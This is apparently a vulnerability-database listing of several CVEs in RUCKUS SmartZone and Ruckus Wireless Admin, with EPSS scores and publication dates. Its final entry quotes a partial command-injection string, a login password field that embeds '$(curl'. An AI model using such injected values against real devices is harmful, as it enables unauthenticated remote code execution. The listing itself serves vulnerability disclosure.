CVE-2025-44954
- EPSS 0.05%
- Veröffentlicht 04.08.2025 00:00:00
- Zuletzt bearbeitet 07.08.2025 17:55:17
RUCKUS SmartZone (SZ) before 6.1.2p3 Refresh Build has a hardcoded SSH private key for a root-equivalent user account.
CVE-2025-44961
- EPSS 0.14%
- Veröffentlicht 04.08.2025 00:00:00
- Zuletzt bearbeitet 07.08.2025 17:59:15
In RUCKUS SmartZone (SZ) before 6.1.2p3 Refresh Build, OS command injection can occur via an IP address field provided by an authenticated user.
CVE-2025-44962
- EPSS 0.04%
- Veröffentlicht 04.08.2025 00:00:00
- Zuletzt bearbeitet 07.08.2025 17:59:20
RUCKUS SmartZone (SZ) before 6.1.2p3 Refresh Build allows ../ directory traversal to read files.
CVE-2025-44957
- EPSS 0.09%
- Veröffentlicht 04.08.2025 00:00:00
- Zuletzt bearbeitet 07.08.2025 17:59:09
Ruckus SmartZone (SZ) before 6.1.2p3 Refresh Build allows authentication bypass via a valid API key and crafted HTTP headers.
CVE-2025-44960
- EPSS 0.16%
- Veröffentlicht 04.08.2025 00:00:00
- Zuletzt bearbeitet 07.08.2025 17:59:12
RUCKUS SmartZone (SZ) before 6.1.2p3 Refresh Build allows OS command injection via a certain parameter in an API route.
CVE-2023-25717
- EPSS 94.23%
- Veröffentlicht 13.02.2023 20:15:10
- Zuletzt bearbeitet 22.08.2025 21:09:15
Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request, as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring.